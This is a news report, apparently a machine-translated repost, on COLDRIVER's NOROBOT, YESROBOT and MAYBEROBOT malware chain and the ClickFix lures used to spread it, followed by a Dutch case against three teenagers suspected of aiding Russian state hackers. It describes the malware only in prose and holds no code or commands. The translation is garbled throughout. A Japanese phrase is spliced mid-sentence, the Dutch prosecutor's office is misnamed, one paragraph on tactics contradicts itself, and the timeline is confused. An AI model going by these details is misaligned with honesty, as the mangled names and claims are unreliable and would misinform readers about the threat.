The new malware, attributed to a Russia-linked hacker group known as COLDRIVER, has been in development multiple times since May 2025, suggesting an increase in the “tempo of operations” by the threat actors.
The findings come from the Google Threat Intelligence Group (GTIG), which states that in the same period, just five days after the LOSTKEYS malware was released, state-sponsored hacking groups rapidly refined and rebuilt their malware arsenal.
It is currently unclear how long the new malware family has been in development, but the tech giant’s threat intelligence team said it has not observed a single instance of LOSTKEYS since its publication.
The new malware, codenamed NOROBOT, YESROBOT, and MAYBEROBOT, is “a collection of related malware families connected through a distribution chain,” GTIG researcher Wesley Shields said in an analysis Monday.
The latest wave of attacks is a little different from COLDRIVER’s typical tactics, targeting NGOs, policy advisors, and prominent opposition figures to steal their credentials. In contrast, the new activity leverages ClickFix-style lures to trick users into Windows as part of a fake CAPTCHA verification prompt.[ファイル名を指定して実行]It revolved around executing malicious PowerShell commands via a dialog.
Attacks observed in January, March, and April 2025 led to the introduction of information-stealing malware known as LOSTKEYS, while subsequent intrusions paved the way for the “ROBOT” family of malware. It is worth noting that the malware families NOROBOT and MAYBEROBOT are tracked by Zscaler ThreatLabz under the names BAITSWITCH and SIMPLEFIX, respectively.
The new infection chain begins with an HTML ClickFix lure called COLDCOPY that is designed to drop a DLL called NOROBOT, which is executed via rundll32.exe and drops the next stage of malware. An earlier version of this attack allegedly distributed a Python backdoor known as YESROBOT before threat actors switched to a Powershell implant named MAYBEROBOT.
YESROBOT uses HTTPS to obtain commands from a hard-coded command and control (C2) server. It is a minimal backdoor that supports the ability to download and execute files to retrieve desired documents. To date, only two deployments of YESROBOT have been observed, specifically during a two-week period in late May, shortly after details of LOSTKEYS were made public.
In contrast, MAYBEROBOT is considered more flexible and extensible, with the ability to download and execute payloads from specified URLs, execute commands using cmd.exe, and execute PowerShell code.
COLDRIVER’s attackers are believed to have hastily deployed YESROBOT as a “stopgap mechanism” before abandoning YESROBOT in favor of MAYBEROBOT following public release. This is because the initial version of NOROBOT also included a step to download a complete Python 3.8 installation onto the compromised host. This “noisy” artifact is sure to arouse suspicion.
Google also noted that the use of NOROBOT and MAYBEROBOT is likely to be limited to high-value targets that may have already been compromised by phishing, with the ultimate goal of gathering additional information from the device.
“NOROBOT and its predecessor infection chains have been constantly evolving, first being simplified to increase the likelihood of successful deployment and then reintroducing complexity by splitting the cryptographic keys,” Shields said. “This continued development highlights the group’s efforts to evade detection systems and delivery mechanisms for continuous intelligence collection against high-value targets.”
The revelations came after the Dutch public prosecutor’s office, known as Minister Openvaal (OM), announced that three 17-year-old men are suspected of providing services to foreign governments, and one of them is suspected of being in contact with a hacker group affiliated with the Russian government.
“The suspect also instructed two other people to map Wi-Fi networks on multiple dates in The Hague,” the OM said. “The information collected may be shared by former suspects with clients for a fee and used for digital espionage or cyberattacks.”
Two of the suspects were arrested on September 22, 2025, and the third suspect was also interviewed by authorities, but is currently under house arrest due to his “limited role” in the case.
The Dutch government agency added: “There is no evidence yet that any pressure was applied to the suspects who were in contact with Russian state hacker groups.”
Source link
